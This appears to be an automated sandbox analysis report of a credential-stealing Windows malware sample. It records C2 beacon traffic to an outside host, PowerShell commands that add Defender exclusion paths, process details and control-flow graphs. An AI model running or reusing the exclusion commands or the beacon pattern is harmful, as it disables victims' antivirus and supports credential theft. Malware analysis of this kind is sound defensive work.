                                                                                                                2024-12-30 10:59:59 UTC1139INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:59 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ts9l1llkcvfh9cog7tbep3joqg; expires=Fri, 25 Apr 2025 04:46:38 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPxb%2Fe3hlIhutGI9%2Fz%2BbgYLipkUgH69dQ6%2F3tgSi3RSnC64J1VNVbvUZ0qQLPvp5kdU%2FzlpdY8V92TiIzJkUN3EpXfoVpkW%2BLVPKbJc%2BodRKTLhuRxUamByUETkGWjZ%2BOvPX"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa185ff3a02431a-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1562&rtt_var=599&sent=359&recv=601&lost=0&retrans=0&sent_bytes=2838&recv_bytes=586765&delivery_rate=1805813&cwnd=224&unsent_bytes=0&cid=425e372504592fa4&ts=1644&x=0"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                9192.168.2.449745104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:59 UTC264OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 77
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:59 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 6e 62 59 52 4b 6c 2d 2d 26 6a 3d 26 68 77 69 64 3d 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31
                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=nbYRKl--&j=&hwid=658E690A0BB22D8620A4C476FD51BCB1
                                                                                                                2024-12-30 11:00:00 UTC1119INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 11:00:00 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=94vbng0u3qnpoqgtsrojulb02t; expires=Fri, 25 Apr 2025 04:46:39 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=54pFLItyiDYQcba0Lq2%2BdaApc5rkpYnbEU5TbeBFwFAQUxt8e2hmrk2cYHBK6nBmGF68XdIQ0IsRXhTvI6iXgca7fBOHwGNPEGSbHPuWq%2FDIHEdeEPBbGaJzS5HnbRCYqSyR"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa1860c3fd9726e-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1864&min_rtt=1851&rtt_var=703&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=977&delivery_rate=1577525&cwnd=224&unsent_bytes=0&cid=af9b34e36d37e1eb&ts=472&x=0"
                                                                                                                2024-12-30 11:00:00 UTC54INData Raw: 33 30 0d 0a 6d 78 6d 6c 4a 6b 4b 2b 62 4a 57 61 76 47 67 73 69 43 41 6f 39 35 59 7a 6b 4e 4a 5a 49 6d 5a 78 73 76 6b 5a 63 4a 4c 42 34 45 62 41 52 41 3d 3d 0d 0a
                                                                                                                Data Ascii: 30mxmlJkK+bJWavGgsiCAo95YzkNJZImZxsvkZcJLB4EbARA==
                                                                                                                2024-12-30 11:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:05:59:22
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\Desktop\eXbhgU9.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\eXbhgU9.exe"
                                                                                                                Imagebase:0x3b0000
                                                                                                                File size:15'360 bytes
                                                                                                                MD5 hash:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:1
                                                                                                                Start time:05:59:22
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:05:59:24
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\FkSpRTrp'
                                                                                                                Imagebase:0x510000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:3
                                                                                                                Start time:05:59:24
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:5
                                                                                                                Start time:05:59:27
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                                                                                                Imagebase:0x510000
                                                                                                                File size:433'152 bytes
                                                                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:05:59:27
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:05:59:37
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\FkSpRTrp\jyidkjkfhjawd.exe"
                                                                                                                Imagebase:0xab0000
                                                                                                                File size:1'282'048 bytes
                                                                                                                MD5 hash:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:17.5%
                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:6
                                                                                                                  Total number of Limit Nodes:0
                                                                                                                  execution_graph 2564 be09b8 2565 be09dc 2564->2565 2567 be0a0b 2565->2567 2568 be04d4 2565->2568 2569 be0b80 GetConsoleWindow 2568->2569 2571 be0c02 2569->2571 2571->2567

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 66 be0f40-be0f6b 67 be0f6d 66->67 68 be0f72-be0fc0 66->68 67->68 69 be0fc9-be0fca 68->69 70 be0fc2 68->70 71 be0fcc-be0fcd 69->71 72 be0fe4-be1074 69->72 70->71 73 be0fde-be17ca 70->73 74 be0fd8-be0fd9 70->74 75 be0fd2-be1395 70->75 76 be123d-be1266 71->76 116 be107f-be1081 72->116 82 be17cd-be17d6 73->82 78 be16d7-be1700 74->78 80 be1398-be13ef 75->80 83 be1269-be12dd 76->83 84 be1703-be1715 call be3261 78->84 105 be1487-be14b2 80->105 90 be17d7-be17e0 82->90 103 be13f4-be147a 83->103 104 be12e3-be1315 83->104 93 be171b-be174a 84->93 91 be17e3-be180d 90->91 96 be1810-be1827 91->96 93->82 114 be1750-be179c 93->114 98 be182d-be18b4 96->98 99 be1086-be10bd 96->99 139 be18b5-be18bc 98->139 111 be110f-be1115 99->111 112 be10bf-be1109 99->112 148 be1485-be1486 103->148 104->80 130 be131b-be1367 104->130 118 be14c7-be14ff 105->118 119 be14b4-be14c2 105->119 120 be111f-be11ec 111->120 112->111 114->139 116->96 121 be1515-be1534 118->121 122 be1501-be1510 118->122 119->96 120->83 162 be11ee-be1238 120->162 128 be154a-be1629 call be1fb0 121->128 129 be1536-be1545 121->129 122->91 128->90 159 be162f-be1640 call be2a81 call be3078 128->159 129->91 130->139 148->105 163 be1646-be1680 159->163 162->76 162->139 163->84 169 be1686-be16d2 163->169 169->78 169->139
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: `lq
                                                                                                                  • API String ID: 0-2378346327
                                                                                                                  • Opcode ID: c17cde3164b84bccd320fc8bf4ac7b209f1700e731891a0b91125b66951fa167
                                                                                                                  • Instruction ID: a4036ca9919d824c2cb8cb391b565647c464bb19f5536c55eae61fe323456a2c
                                                                                                                  • Opcode Fuzzy Hash: c17cde3164b84bccd320fc8bf4ac7b209f1700e731891a0b91125b66951fa167
                                                                                                                  • Instruction Fuzzy Hash: 53529374A01229CFDB64DF69C980B99B7F5BF49300F1085E6D449AB365EB30AE85CF60

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 289 be0f30-be0f6b 290 be0f6d 289->290 291 be0f72-be0fc0 289->291 290->291 292 be0fc9-be0fca 291->292 293 be0fc2 291->293 294 be0fcc-be0fcd 292->294 295 be0fe4-be103e 292->295 293->294 296 be0fde-be17ca 293->296 297 be0fd8-be0fd9 293->297 298 be0fd2-be1395 293->298 299 be123d-be1266 294->299 320 be1044-be1074 295->320 305 be17cd-be17d6 296->305 301 be16d7-be1700 297->301 303 be1398-be13ef 298->303 306 be1269-be12dd 299->306 307 be1703 301->307 328 be1487-be14b2 303->328 313 be17d7-be17e0 305->313 326 be13f4-be1407 306->326 327 be12e3-be1315 306->327 310 be170b-be1715 call be3261 307->310 316 be171b-be174a 310->316 314 be17e3-be180d 313->314 319 be1810-be1827 314->319 316->305 337 be1750-be179c 316->337 321 be182d-be18b4 319->321 322 be1086-be1087 319->322 339 be107f-be1081 320->339 362 be18b5-be18bc 321->362 331 be1092-be10bd 322->331 333 be140f-be1469 326->333 327->303 353 be131b-be1367 327->353 341 be14c7-be14ff 328->341 342 be14b4-be14c2 328->342 334 be110f-be1115 331->334 335 be10bf-be1109 331->335 366 be1474-be147a 333->366 343 be111f-be11ec 334->343 335->334 337->362 339->319 344 be1515-be1534 341->344 345 be1501-be1510 341->345 342->319 343->306 385 be11ee-be1238 343->385 351 be154a-be15be 344->351 352 be1536-be1545 344->352 345->314 372 be15c9-be15e7 call be1fb0 351->372 352->314 353->362 371 be1485-be1486 366->371 371->328 376 be15ed-be1629 372->376 376->313 382 be162f-be1640 call be2a81 call be3078 376->382 386 be1646-be1680 382->386 385->299 385->362 386->307 392 be1686-be16d2 386->392 392->301 392->362
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7b27975699bc33bb12ac5b59753c0bcab7c8946d33ef94c9009b0f839bf97c55
                                                                                                                  • Instruction ID: 4cdf189fcc88b5d1af02304aa09e3a7d903404dd47f9ee1177bc2f3085a623b4
                                                                                                                  • Opcode Fuzzy Hash: 7b27975699bc33bb12ac5b59753c0bcab7c8946d33ef94c9009b0f839bf97c55
                                                                                                                  • Instruction Fuzzy Hash: 30D19274901219CFDB14CF59C984BD9FBF1BF49300F15C6A6D449AB265EB309A89CF60

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 462 be2a81-be2ab2 463 be2ab9-be2b7a call be2584 call be2594 462->463 464 be2ab4 462->464 477 be2b7c-be2b9f 463->477 478 be2ba1-be2be8 call be2594 463->478 464->463 484 be2bf2-be2c0d 477->484 489 be2bf0-be2bf1 478->489 487 be2c0f-be2c18 484->487 488 be2c19 484->488 487->488 489->484
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8455a219c2e47e6c6a5f32362947f0f5b0019c89a9d2c9519d210fd375fcd851
                                                                                                                  • Instruction ID: 626f9e64b9fd9b9023c69420acf043e6e73c7552a658dca9a7e32b959db159bb
                                                                                                                  • Opcode Fuzzy Hash: 8455a219c2e47e6c6a5f32362947f0f5b0019c89a9d2c9519d210fd375fcd851
                                                                                                                  • Instruction Fuzzy Hash: 9951E470D01249DFCB18DFB9D590AADBBB6BF89300F20946AE415BB364DB359942CF04

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 491 be3078-be30a2 492 be30a9-be3178 call be2584 call be2594 491->492 493 be30a4 491->493 506 be317a-be3189 492->506 507 be318b-be31d2 call be2594 492->507 493->492 511 be31dc-be31f7 506->511 518 be31da-be31db 507->518 514 be31f9-be3202 511->514 515 be3203 511->515 514->515 518->511
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9feaabf5291c459f29f5f102372a23d6cd4156e6884f407104c34f8ec635116e
                                                                                                                  • Instruction ID: 1912fc90037cc770915792611a90c4e66beb0fe02642b10427b8c48bf0dbfde6
                                                                                                                  • Opcode Fuzzy Hash: 9feaabf5291c459f29f5f102372a23d6cd4156e6884f407104c34f8ec635116e
                                                                                                                  • Instruction Fuzzy Hash: 4451E474E01209DFCB18DFA9D594AADBBF2BF89300F209469E419B7354DB359942CF04

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 176 be04d4-be0c00 GetConsoleWindow 179 be0c09-be0c35 176->179 180 be0c02-be0c08 176->180 180->179
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2863861424-0
                                                                                                                  • Opcode ID: b335d00e8bfa4a72ca3955d581fb211e580b7b1eb65a50f143d4ce7312e75bdc
                                                                                                                  • Instruction ID: 06751142a3bf25de108195ad8f5c3c78c80f390e5482d6da52aad208bd5f4be7
                                                                                                                  • Opcode Fuzzy Hash: b335d00e8bfa4a72ca3955d581fb211e580b7b1eb65a50f143d4ce7312e75bdc
                                                                                                                  • Instruction Fuzzy Hash: 4E21BBB5D102589FCB10DFA9D584A9EBBF4FB08324F20806AE804B7311D375A941CFA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 183 be0b7a-be0bba 184 be0bc2-be0c00 GetConsoleWindow 183->184 185 be0c09-be0c35 184->185 186 be0c02-be0c08 184->186 186->185
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815859905.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_be0000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2863861424-0
                                                                                                                  • Opcode ID: d0b14cbef94bff920fae56a921c01ef44023298aa13038825f6c280f375e4abf
                                                                                                                  • Instruction ID: 9fa19cf0227919b71f746f1465dc9b9777324356a18766d35c328e2018ec8671
                                                                                                                  • Opcode Fuzzy Hash: d0b14cbef94bff920fae56a921c01ef44023298aa13038825f6c280f375e4abf
                                                                                                                  • Instruction Fuzzy Hash: 7021BCB9D002589FCB10CFA9D584ADEBBF0FB58314F20805AE809B7351C375A945CFA4

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 519 b8d006-b8d044 522 b8d047-b8d049 519->522 522->522 523 b8d04b-b8d079 522->523 527 b8d0c9-b8d0d1 523->527 528 b8d07b-b8d086 523->528 527->528 529 b8d088-b8d096 528->529 530 b8d0be-b8d0c5 528->530 533 b8d09c 529->533 530->529 534 b8d0c7 530->534 535 b8d09f-b8d0a7 533->535 534->535 536 b8d0a9-b8d0b1 535->536 537 b8d0b7-b8d0bc 535->537 537->536
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: ff4010765d23f8654e872f44f5641f089c5f62c46d9c179712bfcd425b1dbb5d
                                                                                                                  • Instruction ID: 2726d716c7d2cf9a5bf539580dfc1db1cb4ba96d1b059acc7b0cefb563f357e7
                                                                                                                  • Opcode Fuzzy Hash: ff4010765d23f8654e872f44f5641f089c5f62c46d9c179712bfcd425b1dbb5d
                                                                                                                  • Instruction Fuzzy Hash: 94210F6240E3D08ED70787248CA46517FB89F53225F0E81DBD889CF1F7C1699849C762
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 2d910f0db11efc426e5439ee606dd573fe29beba998dfc092f3066fd2b61a04b
                                                                                                                  • Instruction ID: 4727d1c109463803597a8eb514c37a60b4102363e87dca03819951dfac218161
                                                                                                                  • Opcode Fuzzy Hash: 2d910f0db11efc426e5439ee606dd573fe29beba998dfc092f3066fd2b61a04b
                                                                                                                  • Instruction Fuzzy Hash: DD213775500244DFCB05EF14D9C0F2BBFA5FB98314F20C5AAE8094B2A6C336D856CBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                  • Instruction ID: 603603fb503a66e9f6e72dfe1ea496b16aef1ff8578ed1b68032ee835d20ddea
                                                                                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                  • Instruction Fuzzy Hash: B811D67A504280CFCB16DF10D5C4B16BFB1FB94314F24C5EAD8094B666C336D856CB91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1815248454.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_b8d000_eXbhgU9.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: aa9ebbad0c59570b445948219440f097c628724198171ba38ac8b563306dcf61
                                                                                                                  • Instruction ID: da549c7a181e16f0237ff6c1fc7a92d1bfeda11f998789aa83e13b9006bf2188
                                                                                                                  • Opcode Fuzzy Hash: aa9ebbad0c59570b445948219440f097c628724198171ba38ac8b563306dcf61
                                                                                                                  • Instruction Fuzzy Hash: 6E01F7311083009AE720AA25DDD4767BFD8EF41320F18C5ABEC094A2E6C2799841C771

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:6.7%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:0%
                                                                                                                  Total number of Nodes:3
                                                                                                                  Total number of Limit Nodes:0
                                                                                                                  execution_graph 20717 8126580 20718 81265c3 SetThreadToken 20717->20718 20719 81265f1 20718->20719

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 181 444b490-444b4a9 182 444b4ae-444b7f5 call 444acbc 181->182 183 444b4ab 181->183 183->182
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.1702632552.0000000004440000.00000040.00000800.00020000.00000000.sdmp, Offset: 04440000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_4440000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: {Ygn^$Ygn^
                                                                                                                  • API String ID: 0-934482850
                                                                                                                  • Opcode ID: 7397e8b2d341df74f7a122eff9b805cbc508e0d6435a666ee02dcfb46463bf9b
                                                                                                                  • Instruction ID: 1d989b7f8186776a80a455d7bc283d7c95d2a39542fbbde793b590eecd1322b2
                                                                                                                  • Opcode Fuzzy Hash: 7397e8b2d341df74f7a122eff9b805cbc508e0d6435a666ee02dcfb46463bf9b
                                                                                                                  • Instruction Fuzzy Hash: 6F9194B1F006945BEF69EFB489005AEB7E2EFC4700B00896ED106AB754DF74AA058BD5

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
